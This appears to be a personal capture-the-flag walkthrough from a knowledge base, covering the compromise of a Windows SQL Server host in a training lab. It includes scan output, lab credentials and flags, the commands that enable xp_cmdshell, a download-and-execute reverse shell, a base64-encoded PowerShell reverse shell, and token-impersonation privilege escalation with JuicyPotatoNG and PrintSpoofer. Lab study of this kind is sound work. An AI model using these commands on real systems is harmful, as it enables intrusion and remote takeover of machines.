Malleum Knowledge Base

Enumeration

5 min read

Rustscan

rustscan -a 172.16.1.5 --ulimit 5000 -- -Pn -sV --script \"'vuln'\"
Open 172.16.1.5:21
Open 172.16.1.5:111
Open 172.16.1.5:135
Open 172.16.1.5:139
Open 172.16.1.5:445
Open 172.16.1.5:1433
Open 172.16.1.5:2049
Open 172.16.1.5:5985
Open 172.16.1.5:47001
Open 172.16.1.5:49673
Open 172.16.1.5:49665
Open 172.16.1.5:49666
Open 172.16.1.5:49664
Open 172.16.1.5:49677
Open 172.16.1.5:49678
Open 172.16.1.5:49680
Open 172.16.1.5:49679
PORT      STATE SERVICE      REASON  VERSION
21/tcp    open  ftp          syn-ack FileZilla ftpd
111/tcp   open  rpcbind      syn-ack 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s     syn-ack Microsoft SQL Server 2019 15.00.2000
| vulners:
|   cpe:/a:microsoft:sql_server:2019:
|     	CVE-2023-23384	7.5	https://vulners.com/cve/CVE-2023-23384
|     	DF707FE2-EC27-5541-BC6A-6C7A0E9CC454	6.5	https://vulners.com/githubexploit/DF707FE2-EC27-5541-BC6A-6C7A0E9CC454	*EXPLOIT*
|     	CVE-2023-21713	6.5	https://vulners.com/cve/CVE-2023-21713
|     	CVE-2023-21705	6.5	https://vulners.com/cve/CVE-2023-21705
|     	CVE-2021-1636	6.5	https://vulners.com/cve/CVE-2021-1636
|     	CVE-2022-29143	6.0	https://vulners.com/cve/CVE-2022-29143
|     	CVE-2023-21718	4.4	https://vulners.com/cve/CVE-2023-21718
|     	CVE-2023-21704	4.3	https://vulners.com/cve/CVE-2023-21704
|_    	CVE-2023-21528	4.3	https://vulners.com/cve/CVE-2023-21528
2049/tcp  open  mountd       syn-ack 1-3 (RPC #100005)
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        syn-ack Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack Microsoft Windows RPC
49673/tcp open  ms-sql-s     syn-ack Microsoft SQL Server 2019 15.00.2000
| vulners:
|   cpe:/a:microsoft:sql_server:2019:
|     	CVE-2023-23384	7.5	https://vulners.com/cve/CVE-2023-23384
|     	DF707FE2-EC27-5541-BC6A-6C7A0E9CC454	6.5	https://vulners.com/githubexploit/DF707FE2-EC27-5541-BC6A-6C7A0E9CC454	*EXPLOIT*
|     	CVE-2023-21713	6.5	https://vulners.com/cve/CVE-2023-21713
|     	CVE-2023-21705	6.5	https://vulners.com/cve/CVE-2023-21705
|     	CVE-2021-1636	6.5	https://vulners.com/cve/CVE-2021-1636
|     	CVE-2022-29143	6.0	https://vulners.com/cve/CVE-2022-29143
|     	CVE-2023-21718	4.4	https://vulners.com/cve/CVE-2023-21718
|     	CVE-2023-21704	4.3	https://vulners.com/cve/CVE-2023-21704
|_    	CVE-2023-21528	4.3	https://vulners.com/cve/CVE-2023-21528
49677/tcp open  msrpc        syn-ack Microsoft Windows RPC
49678/tcp open  msrpc        syn-ack Microsoft Windows RPC
49679/tcp open  msrpc        syn-ack Microsoft Windows RPC
49680/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

FTP

ftp 172.16.1.5
anonymous
anonymous
mget *

Got the flag

DANTE{Ther3s_M0r3_to_pwn_so_k33p_searching!}

Found creds for sophie in Nix06

Login to mssql client on SQL01

impacket-mssqlclinet

impacket-mssqlclient dante.local/sophie:TerrorInflictPurpleDirt996655@172.16.1.5

MSSQL Enumeration

select @@version;

# Check if xp_cmdshell is enabled

SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell

sp_configure 'show advanced options', '1'

RECONFIGURE

#This enables xp_cmdshell

sp_configure 'xp_cmdshell', '1'

RECONFIGURE

#One liner

sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check what the service account is via xp_cmdshell

EXEC master..xp_cmdshell 'whoami'


# Get rev shell

EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.45.195:80/large1.ps1") | powershell -noprofile'

getting the flag

Location C:\Users\flag.txt

DANTE{Mult1ple_w4Ys_in!}

Priv Esc

As I did login from mssql account I have SE Impersonate privilege

Priv Esc

Restriction in copying the file

Using smb share to execute (Exploit didn”T work) File Transfer SMB

jay ~/Documents/tool_for_oscp/privesc-windows/windows-token-abuse took 2m35s
 impacket-smbserver PleaseSub $(pwd) -smb2support

Copy both the files juicy potato and t.bat in the directory window-token-abuse.

\\10.10.14.3\PLEASESUB\JuicyPotatoNG.exe -t * -p \\10.10.14.3\PLEASESUB\t.bat

Found DB backups

C:\DB_backups


SHELL> type db_backup.ps1
# Work in progress database backup script. Adapting from mysql backup script. Does not work yet. Do not use.

$password = 'Alltheleavesarebrown1'
$user = 'sophie'
$cred = New-Object System.Net.NetworkCredential($user, $password, "")

$date = Get-Date
$dateString = $date.Year.ToString() + "-" + $date.Month.ToString() + "-" + $date.Day.ToString()

#Create symbolic link for sqldump.exe in the script folder
$sqldumpLocation = \.sqldump.exe
$backupDest = C:\DB_backups\SQL\sql_backup_"+ $dateString + ".sql"

$execute_sqldump = $sqldumpLocation+" -u"+$cred.UserName+" -p"+$cred.Password +" > " + $backupDest


invoke-expression $execute_sqldump


# use 7zip to compress and encrypt the backup with same password as used to autheticate the sql backup user
# removes the unencrypted .sql file afterwards
# create symbolic link for 7z.exe in the script folder
$sevenzip = ".#7z.exe"
$zipfile = $backupDest.Replace(".sql",".7z")
$execute7zip = $sevenzip+" a -t7z "+$zipfile+" "+$backupDest+" -p"+$cred.Password
invoke-expression $execute7zip
Remove-Item $backupDest

Evil-winrm (Didn’t work )

evil-winrm -i 172.16.1.5 -u 'sophie' -H Alltheleaversarebrown1 /domain:dante.local

Paste powershell shell again in the obtained shell.

SHELL> powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

nc -lvnp 4445

Trying juicy exploit again

\\10.10.14.3\PLEASESUB\JuicyPotatoNG.exe -t * -p \\10.10.14.3\PLEASESUB\t.bat

Printspoofer

./PrintSpoofer64.exe -i -c 'C:\DB_backups\t.bat'

Flag

PS C:\Users\Administrator\Desktop> type flag.txt DANTE{Ju1cy_pot4t03s_in_th3_wild}

Graph View